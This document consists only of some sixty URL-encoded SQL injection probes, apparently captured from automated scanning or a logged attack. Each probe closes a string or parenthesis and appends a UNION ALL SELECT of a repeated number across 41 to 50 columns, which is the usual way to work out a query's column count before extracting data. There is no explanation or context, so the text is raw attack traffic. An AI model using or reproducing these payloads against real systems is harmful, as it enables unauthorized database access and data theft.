-6871%22%29%29%20UNION%20ALL%20SELECT%204685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685%2C4685--%20 -7107%22%29%29%20UNION%20ALL%20SELECT%203112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112%2C3112--%20 -9619%22%29%29%20UNION%20ALL%20SELECT%209151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151%2C9151--%20 -7153%22%29%29%20UNION%20ALL%20SELECT%208196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196%2C8196--%20 -9372%22%29%29%29%20UNION%20ALL%20SELECT%206748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748%2C6748--%20 -7013%22%29%29%29%20UNION%20ALL%20SELECT%206789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789%2C6789--%20 -7144%22%29%29%29%20UNION%20ALL%20SELECT%208042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042%2C8042--%20 -6052%22%29%29%29%20UNION%20ALL%20SELECT%203191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191%2C3191--%20 -7531%22%29%29%29%20UNION%20ALL%20SELECT%204325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325%2C4325--%20 -3806%22%29%29%29%20UNION%20ALL%20SELECT%206487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487%2C6487--%20 -8452%22%29%29%29%20UNION%20ALL%20SELECT%203882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882%2C3882--%20 -6744%22%29%29%29%20UNION%20ALL%20SELECT%205193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193%2C5193--%20 -2179%22%29%29%29%20UNION%20ALL%20SELECT%202146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146%2C2146--%20 -7225%22%29%29%29%20UNION%20ALL%20SELECT%201375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375%2C1375--%20 -9393%22%20UNION%20ALL%20SELECT%206365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365%2C6365--%20 -2458%22%20UNION%20ALL%20SELECT%206169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169%2C6169--%20 -9346%22%20UNION%20ALL%20SELECT%208119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119%2C8119--%20 -4414%22%20UNION%20ALL%20SELECT%207240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240%2C7240--%20 -5581%22%20UNION%20ALL%20SELECT%207781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781%2C7781--%20 -7088%22%20UNION%20ALL%20SELECT%203055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055--%20 -4206%22%20UNION%20ALL%20SELECT%202202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202%2C2202--%20 -4819%22%20UNION%20ALL%20SELECT%206355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355%2C6355--%20 -3804%22%20UNION%20ALL%20SELECT%205179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179--%20 -9563%22%20UNION%20ALL%20SELECT%209250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250%2C9250--%20 -1465%22%29%20UNION%20ALL%20SELECT%204086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086%2C4086--%20 -7090%22%29%20UNION%20ALL%20SELECT%204227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227%2C4227--%20 -1221%22%29%20UNION%20ALL%20SELECT%209357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357%2C9357--%20 -4788%22%29%20UNION%20ALL%20SELECT%202346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346%2C2346--%20 -1047%22%29%20UNION%20ALL%20SELECT%203229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229%2C3229--%20 -1800%22%29%20UNION%20ALL%20SELECT%204846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846%2C4846--%20 -7991%22%29%20UNION%20ALL%20SELECT%205341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341%2C5341--%20 -8819%22%29%20UNION%20ALL%20SELECT%209223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223%2C9223--%20 -3845%22%29%20UNION%20ALL%20SELECT%201095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095%2C1095--%20 -8232%22%29%20UNION%20ALL%20SELECT%204753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753%2C4753--%20 -9981%22%29%29%20UNION%20ALL%20SELECT%207522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522%2C7522--%20 -6552%22%29%29%20UNION%20ALL%20SELECT%206850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850%2C6850--%20 -8912%22%29%29%20UNION%20ALL%20SELECT%208118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118%2C8118--%20 -1904%22%29%29%20UNION%20ALL%20SELECT%206284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284%2C6284--%20 -1195%22%29%29%20UNION%20ALL%20SELECT%203591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591%2C3591--%20 -9145%22%29%29%20UNION%20ALL%20SELECT%204402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402%2C4402--%20 -2810%22%29%29%20UNION%20ALL%20SELECT%205902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902%2C5902--%20 -9071%22%29%29%20UNION%20ALL%20SELECT%205590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590%2C5590--%20 -2698%22%29%29%20UNION%20ALL%20SELECT%209376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376%2C9376--%20 -2253%22%29%29%20UNION%20ALL%20SELECT%209381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381%2C9381--%20 -1577%22%29%29%29%20UNION%20ALL%20SELECT%205315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315%2C5315--%20 -1786%22%29%29%29%20UNION%20ALL%20SELECT%205255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255%2C5255--%20 -1079%22%29%29%29%20UNION%20ALL%20SELECT%203483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483%2C3483--%20 -1027%22%29%29%29%20UNION%20ALL%20SELECT%209420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420%2C9420--%20 -7455%22%29%29%29%20UNION%20ALL%20SELECT%207789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789%2C7789--%20 -9431%22%29%29%29%20UNION%20ALL%20SELECT%204932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932%2C4932--%20 -9105%22%29%29%29%20UNION%20ALL%20SELECT%203166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166%2C3166--%20 -7777%22%29%29%29%20UNION%20ALL%20SELECT%202229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229%2C2229--%20 -4467%22%29%29%29%20UNION%20ALL%20SELECT%208801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801%2C8801--%20 -6876%22%29%29%29%20UNION%20ALL%20SELECT%205520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520%2C5520--%20 -9838%22%20UNION%20ALL%20SELECT%207185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185%2C7185--%20 -1409%22%20UNION%20ALL%20SELECT%205369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369%2C5369--%20 -4048%22%20UNION%20ALL%20SELECT%203282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282%2C3282--%20 -9516%22%20UNION%20ALL%20SELECT%207118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118%2C7118--%20 -2586%22%20UNION%20ALL%20SELECT%202750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750%2C2750--%20 